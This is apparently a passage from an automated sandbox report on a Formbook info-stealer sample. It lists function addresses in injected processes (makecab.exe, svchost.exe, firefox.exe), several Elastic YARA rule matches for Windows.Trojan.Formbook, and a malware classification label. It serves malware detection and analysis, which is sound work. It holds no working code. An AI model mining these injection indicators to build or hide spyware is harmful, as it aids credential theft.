            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04772F60 NtCreateProcessEx,6_2_04772F60
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04772FA0 NtQuerySection,6_2_04772FA0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04772F90 NtProtectVirtualMemory,6_2_04772F90
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04772AB0 NtWaitForSingleObject,6_2_04772AB0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04772B80 NtQueryInformationFile,6_2_04772B80
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_02829200 NtClose,6_2_02829200
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_02829360 NtAllocateVirtualMemory,6_2_02829360
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_02829070 NtReadFile,6_2_02829070
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_02829160 NtDeleteFile,6_2_02829160
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_02828F00 NtCreateFile,6_2_02828F00
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_045DF9FC NtMapViewOfSection,6_2_045DF9FC
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_045DFA51 NtClose,6_2_045DFA51
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024286231_2_02428623
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0241228F1_2_0241228F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024122901_2_02412290
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0243EB331_2_0243EB33
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024268131_2_02426813
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024130C01_2_024130C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024130B61_2_024130B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024201131_2_02420113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0241111B1_2_0241111B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024111201_2_02411120
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0241E1931_2_0241E193
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0241FEEA1_2_0241FEEA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0241FEF31_2_0241FEF3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024127901_2_02412790
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024124881_2_02412488
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024124901_2_02412490
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC02C01_2_02EC02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EE02741_2_02EE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4E3F01_2_02E4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F003E61_2_02F003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFA3521_2_02EFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED20001_2_02ED2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF81CC1_2_02EF81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F001AA1_2_02F001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC81581_2_02EC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E301001_2_02E30100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDA1181_2_02EDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5C6E01_2_02E5C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3C7C01_2_02E3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E407701_2_02E40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E647501_2_02E64750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EEE4F61_2_02EEE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF24461_2_02EF2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EE44201_2_02EE4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F005911_2_02F00591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E405351_2_02E40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3EA801_2_02E3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF6BD71_2_02EF6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFAB401_2_02EFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6E8F01_2_02E6E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E268B81_2_02E268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4A8401_2_02E4A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E428401_2_02E42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E429A01_2_02E429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F0A9A61_2_02F0A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E569621_2_02E56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFEEDB1_2_02EFEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E52E901_2_02E52E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFCE931_2_02EFCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E40E591_2_02E40E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFEE261_2_02EFEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E32FC81_2_02E32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EBEFA01_2_02EBEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB4F401_2_02EB4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E82F281_2_02E82F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E60F301_2_02E60F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EE2F301_2_02EE2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E30CF21_2_02E30CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EE0CB51_2_02EE0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E40C001_2_02E40C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3ADE01_2_02E3ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E58DBF1_2_02E58DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4AD001_2_02E4AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDCD1F1_2_02EDCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EE12ED1_2_02EE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5D2F01_2_02E5D2F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5B2C01_2_02E5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E452A01_2_02E452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E8739A1_2_02E8739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2D34C1_2_02E2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF132D1_2_02EF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF70E91_2_02EF70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFF0E01_2_02EFF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EEF0CC1_2_02EEF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E470C01_2_02E470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4B1B01_2_02E4B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E7516C1_2_02E7516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2F1721_2_02E2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F0B16B1_2_02F0B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF16CC1_2_02EF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFF7B01_2_02EFF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E314601_2_02E31460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFF43F1_2_02EFF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDD5B01_2_02EDD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF75711_2_02EF7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EEDAC61_2_02EEDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDDAAC1_2_02EDDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E85AA01_2_02E85AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EE1AA31_2_02EE1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB3A6C1_2_02EB3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFFA491_2_02EFFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF7A461_2_02EF7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB5BF01_2_02EB5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E7DBF91_2_02E7DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5FB801_2_02E5FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFFB761_2_02EFFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E438E01_2_02E438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAD8001_2_02EAD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E499501_2_02E49950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5B9501_2_02E5B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED59101_2_02ED5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E49EB01_2_02E49EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFFFB11_2_02EFFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E41F921_2_02E41F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFFF091_2_02EFFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFFCF21_2_02EFFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB9C321_2_02EB9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5FDC01_2_02E5FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF7D731_2_02EF7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E43D401_2_02E43D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF1D5A1_2_02EF1D5A
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047314606_2_04731460
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047F24466_2_047F2446
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047FF43F6_2_047FF43F
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047EE4F66_2_047EE4F6
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047F75716_2_047F7571
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_048005916_2_04800591
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047405356_2_04740535
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047DD5B06_2_047DD5B0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0475C6E06_2_0475C6E0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047F16CC6_2_047F16CC
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047407706_2_04740770
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047647506_2_04764750
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0473C7C06_2_0473C7C0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047FF7B06_2_047FF7B0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047F70E96_2_047F70E9
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047FF0E06_2_047FF0E0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047EF0CC6_2_047EF0CC
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047470C06_2_047470C0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0472F1726_2_0472F172
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0477516C6_2_0477516C
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_048001AA6_2_048001AA
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047DA1186_2_047DA118
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047301006_2_04730100
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047F81CC6_2_047F81CC
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0474B1B06_2_0474B1B0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0480B16B6_2_0480B16B
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047E02746_2_047E0274
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0475D2F06_2_0475D2F0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047E12ED6_2_047E12ED
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0475B2C06_2_0475B2C0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047452A06_2_047452A0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047FA3526_2_047FA352
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0472D34C6_2_0472D34C
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047F132D6_2_047F132D
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_048003E66_2_048003E6
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0474E3F06_2_0474E3F0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0478739A6_2_0478739A
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047B9C326_2_047B9C32
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04740C006_2_04740C00
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04730CF26_2_04730CF2
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047FFCF26_2_047FFCF2
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047E0CB56_2_047E0CB5
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047F7D736_2_047F7D73
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047F1D5A6_2_047F1D5A
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04743D406_2_04743D40
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0474AD006_2_0474AD00
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0473ADE06_2_0473ADE0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0475FDC06_2_0475FDC0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04758DBF6_2_04758DBF
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04740E596_2_04740E59
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047FEE266_2_047FEE26
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047FEEDB6_2_047FEEDB
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04749EB06_2_04749EB0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04752E906_2_04752E90
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047FCE936_2_047FCE93
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047B4F406_2_047B4F40
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04760F306_2_04760F30
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04782F286_2_04782F28
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047FFF096_2_047FFF09
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04732FC86_2_04732FC8
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047FFFB16_2_047FFFB1
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04741F926_2_04741F92
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047428406_2_04742840
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0474A8406_2_0474A840
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0476E8F06_2_0476E8F0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047438E06_2_047438E0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047268B86_2_047268B8
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047569626_2_04756962
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047499506_2_04749950
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0475B9506_2_0475B950
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0480A9A66_2_0480A9A6
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047429A06_2_047429A0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047B3A6C6_2_047B3A6C
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047FFA496_2_047FFA49
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047F7A466_2_047F7A46
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047EDAC66_2_047EDAC6
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047DDAAC6_2_047DDAAC
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04785AA06_2_04785AA0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0473EA806_2_0473EA80
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047FFB766_2_047FFB76
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047FAB406_2_047FAB40
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0477DBF96_2_0477DBF9
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047F6BD76_2_047F6BD7
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0475FB806_2_0475FB80
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_02811C506_2_02811C50
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_028152F06_2_028152F0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_028134E06_2_028134E0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0280CBB76_2_0280CBB7
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0280CBC06_2_0280CBC0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0282B8006_2_0282B800
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0280AE606_2_0280AE60
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0280CDE06_2_0280CDE0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_045DE4C46_2_045DE4C4
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_045DE3A86_2_045DE3A8
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_045DE85C6_2_045DE85C
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_045DD8C86_2_045DD8C8
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_045DCB686_2_045DCB68
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeCode function: 7_2_0565C5437_2_0565C543
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeCode function: 7_2_0563D9037_2_0563D903
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeCode function: 7_2_056429937_2_05642993
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeCode function: 7_2_056460337_2_05646033
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeCode function: 7_2_0563D8FA7_2_0563D8FA
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeCode function: 7_2_0563DB237_2_0563DB23
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeCode function: 7_2_0563BBA37_2_0563BBA3
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeCode function: 7_2_056442237_2_05644223
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_000002469BF708C88_2_000002469BF708C8
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_000002469BF714C48_2_000002469BF714C4
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_000002469BF7185C8_2_000002469BF7185C
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_000002469BF713A88_2_000002469BF713A8
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_000002469BF6FB688_2_000002469BF6FB68
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02E75130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02E2B970 appears 257 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02EAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02E87E54 appears 99 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02EBF290 appears 103 times
            Source: C:\Windows\SysWOW64\makecab.exeCode function: String function: 0472B970 appears 248 times
            Source: C:\Windows\SysWOW64\makecab.exeCode function: String function: 047AEA12 appears 84 times
            Source: C:\Windows\SysWOW64\makecab.exeCode function: String function: 04775130 appears 36 times
            Source: C:\Windows\SysWOW64\makecab.exeCode function: String function: 04787E54 appears 85 times
            Source: C:\Windows\SysWOW64\makecab.exeCode function: String function: 047BF290 appears 103 times
            Source: 8mmZ7Bkoj1.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.2410000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.2410000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2155548191.0000000002C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3561632009.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2147046823.0000000002410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3563473884.0000000005600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2162734748.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3560663904.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3561586168.0000000004490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3561735545.00000000056D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@10/5
